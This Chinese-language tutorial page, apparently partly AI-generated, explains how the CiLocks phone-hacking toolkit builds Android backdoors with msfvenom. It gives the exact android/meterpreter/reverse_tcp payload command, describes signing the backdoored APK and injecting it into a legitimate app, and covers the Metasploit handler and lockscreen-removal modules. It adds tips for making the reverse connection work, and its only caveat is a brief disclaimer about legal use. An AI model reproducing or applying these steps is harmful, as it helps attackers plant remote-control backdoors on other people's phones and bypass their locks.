☰
CiLocks msfvenom参数完全解析:LHOST、LPORT与reverse_tcp一次看懂
2026/9/27 17:29:50 网站建设 项目流程

CiLocks msfvenom参数完全解析:LHOST、LPORT与reverse_tcp一次看懂

【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks

CiLocks 是一款开源的 Android/iOS 锁屏破解工具箱,其中内置了基于msfvenom的后门载荷生成功能。本文以 CiLocks 为例,把新手最常问的三个 msfvenom 参数——LHOST、LPORT与reverse_tcp——一次讲透:它们各代表什么、怎么填、有哪些坑,帮助你 10 分钟看懂 CiLocks 的 Metasploit 模块。

上图是 CiLocks 的主菜单,选项 10 "Jump To Metasploit" 就是进入 msfvenom 后门生成模块的入口。

CiLocks Metasploit 后门生成器菜单速览

选择 10 后会进入Metasploit Backdoor Generator子菜单,共 4 个选项:

选项功能底层机制
1. Install Application通过 adb 安装并启动指定 APKadb install + am start
2. Create Payload Backdoor {Msfvenom} Signed用 msfvenom 生成已签名的后门 APKmsfvenom + keytool + jarsigner + zipalign
3. Run Metasploit自动开启监听等待载荷回连exploit/multi/handler 等模块
4. Inject Payload In Original Application向原始 APK 中注入 msfvenom 载荷msfvenom -x 注入

对应实现逻辑集中在主脚本的选项 10 分支中:cilocks。

LHOST 参数解析:载荷回连的"大本营"IP

  • LHOST = Local Host(本地主机),填你本机的 IP 地址
  • 目标设备安装 APK 后,会主动向 LHOST 发起连接(而不是你连它)
  • 如何获取:终端执行ip addr | grep 'state UP';CiLocks 启动时也会自动检测并打印 "Your IP Address"(cilocks)
  • ⚠️ 必须填目标能访问到的局域网 IP,填 127.0.0.1 对目标没有意义

LPORT 参数解析:本机监听的端口号

  • LPORT = Local Port(本地端口),即你等待载荷回连的端口
  • 生成 APK 时填的 LPORT,与后面运行 Metasploit 监听器时必须完全一致
  • Metasploit 默认常用 4444,只要端口未被其他程序占用即可
  • 换了 LPORT 就必须重新生成APK,否则永远等不到回连

reverse_tcp 解析:为什么用"反向连接"

  • reverse_tcp(反向 TCP):由被控端(手机)主动拨号到攻击机,而非攻击机主动外联
  • 适合目标位于 NAT、路由器之后的场景,无需端口映射,这也是移动端渗透的首选
  • CiLocks 中 Android 使用android/meterpreter/reverse_tcp,iOS 使用osx/armle/execute/reverse_tcp(cilocks)

CiLocks 选项 2 的核心生成命令(主脚本第 377 行):

msfvenom -p android/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> R> loli.apk
  • -p指定 payload(载荷)类型
  • lhost= / lport=即上文解析的两个关键 msfvenom 参数
  • R>将编码后的载荷重定向输出为 APK 文件

生成后 CiLocks 还会自动完成签名与对齐:keytool 生成 keystore → jarsigner 签名 → zipalign 对齐,最终产出可正常安装的签名 APK(cilocks)。

运行 Metasploit 监听:LHOST 与 LPORT 的二次确认

选择选项 3 "Run Metasploit" 时,会再次询问 LHOST 和 LPORT,并根据监听器选择在新终端窗口自动组装 msfconsole 命令:

监听器msfconsole 模块用途
1. Multi Handler {Default}exploit/multi/handler通用载荷回连处理
2. Remove Lockpost/android/manage/remove_lock载荷上线后移除锁屏
3. Remove Lock {Root}post/android/manage/remove_lock_root已 Root 设备移除锁屏
4. Safari Jit {iOS < 7.1.2}exploit/apple_ios/browser/safari_jit旧版 iOS Safari JIT 利用

组装逻辑位于 cilocks,会自动set PAYLOAD、set lhost、set lport后执行exploit;。

新手常见 4 个坑,一次避完

  1. LHOST / LPORT 两端不一致:生成 APK 与监听器的参数必须一一对应,这是"收不到回连"的首要原因
  2. LHOST 填错地址:填目标所在网络的局域网 IP,不要填公网 IP 或 127.0.0.1
  3. 端口被占用:监听器报 Address already in use 时,换一个 LPORT 并重新生成载荷
  4. 防火墙拦截:确认本机防火墙已放行 LPORT,且两端网络互通

环境准备与相关目录

  • 安装 Metasploit:sudo apt install msfconsole -y;CiLocks 启动时由 data/config 自动检测是否已安装并提示
  • 生成的后门 APK 统一保存在 backdoor/ 目录
  • 完整安装步骤与依赖清单见 README.md
  • 其他模块:PIN 暴力破解字典 4digit.txt、6digit.txt,AntiGuard 锁屏绕过应用源码 unlock.java

⚠️注意:CiLocks 仅供安全学习与授权测试使用,请勿用于任何非法活动(README 明确声明 "Please Don't Use for illegal Activity")。

【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询